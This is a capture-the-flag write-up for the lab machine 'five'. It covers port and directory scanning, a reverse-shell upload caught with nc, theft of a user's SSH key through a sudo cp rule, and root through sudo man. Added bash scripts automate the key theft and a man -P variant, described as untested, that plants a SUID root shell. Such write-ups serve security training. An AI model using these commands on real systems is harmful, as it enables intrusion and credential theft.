Information gathering
Host discovery
arp-scan -l
Port scanning
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 07:17 EDT
Nmap scan report for 192.168.254.187
Host is up (0.00024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
MAC Address: 08:00:27:38:74:E0 (Oracle VirtualBox virtual NIC)
Directory scanning
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x .php,.txt,.jpg,.html -u http://192.168.254.187
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.254.187
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,jpg,html,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 185] [--> http://192.168.254.187/uploads/]
/admin (Status: 301) [Size: 185] [--> http://192.168.254.187/admin/]
/upload.html (Status: 200) [Size: 346]
/upload.php (Status: 200) [Size: 48]
/robots.txt (Status: 200) [Size: 17]
Port 80 exposes three interesting paths:
/admin
/uploads
/upload.html
Upload a shell. Following 绿老哥's blog, I found a handy site that generates reverse shells; it just works. The IP you enter there is your attacking machine's IP (the port is whatever your listener will use):
Online – Reverse Shell Generator (revshells.com)
Then upload the generated file. One thing to watch: browsing to /uploads returns an error, so the upload path has to be changed. Simply delete it and the file is stored in the web root by default. (Borrowing 绿老哥's screenshot here; I deleted mine, hehe.)
Getting a shell
kali: nc -lnvp 1234
Reading user.txt fails for lack of permissions. A look at /home shows there is indeed another user, so on to privilege escalation.
Privilege escalation
- sudo -l shows a cp entry that can be abused:
Matching Defaults entries for www-data on five:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on five:
(melisa) NOPASSWD: /bin/cp
My first thought was to create an id_rsa in /tmp and have cp, running as melisa, copy melisa's private key over it. A write-up by 师傅 confirmed this approach, but I had missed one step: the public key has to be derived from that private key and placed in melisa's authorized_keys, and then you log in with the private key. That way no password is needed (I had seen this technique before), and the login succeeded. Two details make it work: cp onto a file that already exists keeps the destination's owner, so the copy stays readable by www-data instead of being created as a 600 file owned by melisa; and melisa must be able to write that file, so if your umask leaves it at 644, run chmod 666 /tmp/id_rsa before the copy.
cd /tmp
touch id_rsa                                  # create the destination as www-data so it stays ours after the copy
sudo -u melisa cp /home/melisa/.ssh/id_rsa /tmp/id_rsa
chmod 600 id_rsa                              # ssh refuses a private key readable by others
ssh-keygen -y -f id_rsa > authorized_keys     # derive the public key from the private key
sudo -u melisa cp /tmp/authorized_keys /home/melisa/.ssh/authorized_keys
ssh -i id_rsa melisa@localhost -p 4444
Port 22 is not open, so SSH is reached on port 4444 instead. The full-port scan earlier showed only port 80 from outside, so 4444 is reachable only from the box itself, which is why the connection goes to localhost; if in doubt, confirm the listening port from the shell with ss -tlnp.
Successfully switched to melisa.
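To show why the "touch first, then sudo -u melisa cp" ordering matters, here is an added example (editor's code, not from the original write-up). The first function demonstrates the file-system mechanism as a single user: cp onto an existing file opens it for truncating write, so the destination keeps its mode (and, on the target, its www-data owner). The second function is the full escalation as it would be typed on the box; it is not run here because it needs the sudo rule, and the port 4444 and the target paths are taken from the write-up rather than discovered by this script.

```bash
#!/bin/bash
# Added example, not part of the original write-up. Shows why the "touch first,
# then sudo -u melisa cp" trick works: cp onto an EXISTING file opens it
# O_WRONLY|O_TRUNC, so the destination keeps its owner and mode. A file created
# by www-data and overwritten by melisa's cp therefore stays readable by
# www-data, whereas a fresh copy would be created owned by melisa with mode 600.

# Single-user demonstration of the mechanism: a 0600 source copied onto a 0666
# destination leaves the destination at 0666 with the source's content.
demo_cp_keeps_dest_mode() {
    local dir mode content
    dir=$(mktemp -d) || return 1
    printf 'SECRET\n' > "$dir/src" && chmod 600 "$dir/src"
    : > "$dir/dst" && chmod 666 "$dir/dst"   # the "touch id_rsa" step, made writable for melisa
    cp "$dir/src" "$dir/dst"                 # the "sudo -u melisa cp" step
    mode=$(stat -c '%a' "$dir/dst")          # GNU stat; a Linux target is assumed
    content=$(cat "$dir/dst")
    rm -rf "$dir"
    printf '%s %s\n' "$mode" "$content"
}

# The escalation as run from the www-data shell on the target. Not invoked here:
# it needs the rule "(melisa) NOPASSWD: /bin/cp". Port 4444 comes from the
# write-up; confirm it on the box with: ss -tlnp
steal_melisa_key() {
    cd /tmp || return 1
    : > id_rsa && chmod 666 id_rsa            # owned by www-data, writable by melisa
    sudo -u melisa /bin/cp /home/melisa/.ssh/id_rsa /tmp/id_rsa || return 1
    chmod 600 id_rsa                          # ssh refuses keys readable by others
    ssh-keygen -y -f id_rsa > authorized_keys || return 1   # public key from private key
    sudo -u melisa /bin/cp /tmp/authorized_keys /home/melisa/.ssh/authorized_keys || return 1
    ssh -i id_rsa melisa@localhost -p 4444
}

demo_cp_keeps_dest_mode
```

Running the script on any Linux box prints `666 SECRET`: the secret was copied in, and the destination's mode survived the copy. Without the pre-created file, cp would create a new 600 file owned by melisa and www-data could not read it.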
sudo -l
Matching Defaults entries for melisa on five:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User melisa may run the following commands on five:
(ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm,
/bin/clear
Escalate through man, but running it gives an error:
sudo man man
Your terminal lacks the ability to clear the screen or position the cursor.
Per 师傅's hint, man has to be told which pager to use; first time I had heard of this. The reverse-shell session has no usable terminal type, so man's default pager refuses to start. Forcing less with -P only produces a warning, and from the less prompt the ! command runs a shell, which is root because man itself is running under sudo. Note also the SETENV tag in the rule: it lets melisa pass environment variables such as MANPAGER on the sudo command line, which man honours, so that is another way to pick the pager.
melisa@five:~$ sudo /bin/man -P /usr/bin/less man
WARNING: terminal is not fully functional
-  (press RETURN)
!/bin/bash
root@five:/home/melisa# cd /root
root@five:~# ls
root.txt
root@five:~# cat root.txt
WTFGivemefive
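As an added example (editor's code, not from the original write-up), the script below does two things around the man escalation. The first function parses sudo -l output to confirm the two facts the technique relies on, /bin/man in the allowed list and the SETENV tag; the sample text is the page's own sudo -l output for melisa, embedded as a constructed string so the check runs offline. The second function is a non-interactive variant of the escalation that I am adding on the strength of man's documented -P option, which accepts "a command with arguments" as the pager; it plants a SUID copy of bash instead of typing !/bin/bash at the less prompt. It is not run here, needs the sudo rule, and should be launched from a terminal-backed shell, since man may skip the pager entirely when its output is not a terminal.

```bash
#!/bin/bash
# Added example, not part of the original write-up.
# Part 1: parse `sudo -l` output for the two things the man escalation needs.
# Part 2: the escalation, via man's -P option (not run here; needs the sudo rule).

# The page's own sudo -l output for melisa, embedded as a constructed sample.
SUDO_L_SAMPLE='Matching Defaults entries for melisa on five:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User melisa may run the following commands on five:
    (ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm,
        /bin/clear'

# Prints "man=yes|no setenv=yes|no" for a block of sudo -l output.
parse_sudo_rules() {
    local text=$1 man=no setenv=no rules item
    # Keep only the rule lines after the "may run" header, joined onto one line
    # so a command list wrapped across lines is still handled.
    rules=$(printf '%s\n' "$text" | sed -n '/may run the following/,$p' | tail -n +2 | tr '\n' ' ')
    case "$rules" in *"SETENV:"*) setenv=yes ;; esac
    # Drop the "(ALL) TAG: TAG:" prefix (everything up to the last ": "),
    # then split the command list on commas and compare each entry exactly.
    for item in $(printf '%s\n' "$rules" | sed 's/.*: //; s/,/ /g'); do
        if [ "$item" = /bin/man ]; then man=yes; fi
    done
    printf 'man=%s setenv=%s\n' "$man" "$setenv"
}

# Escalation. Under sudo, man runs whatever -P names as the pager, as root.
# The write-up's interactive form: sudo /bin/man -P /usr/bin/less man, then
# "!/bin/bash" at the less prompt. This variant is an editor's addition, assumed
# to work from man's documented -P syntax ("a command with arguments"): the
# pager command plants a SUID bash, which is then run with -p to keep euid 0.
root_via_man() {
    sudo /bin/man -P "/bin/sh -c 'cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash'" man || true
    [ -u /tmp/rootbash ] || return 1      # the pager command did not run as root
    /tmp/rootbash -p
}

parse_sudo_rules "$SUDO_L_SAMPLE"
```

Run stand-alone, the script prints `man=yes setenv=yes` for the sample; point parse_sudo_rules at real `sudo -l` output to triage a new box the same way.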
Key takeaways
- SSH login with a public/private key pair
- Forcing man's pager with -P
- Uploading a reverse shell through a file upload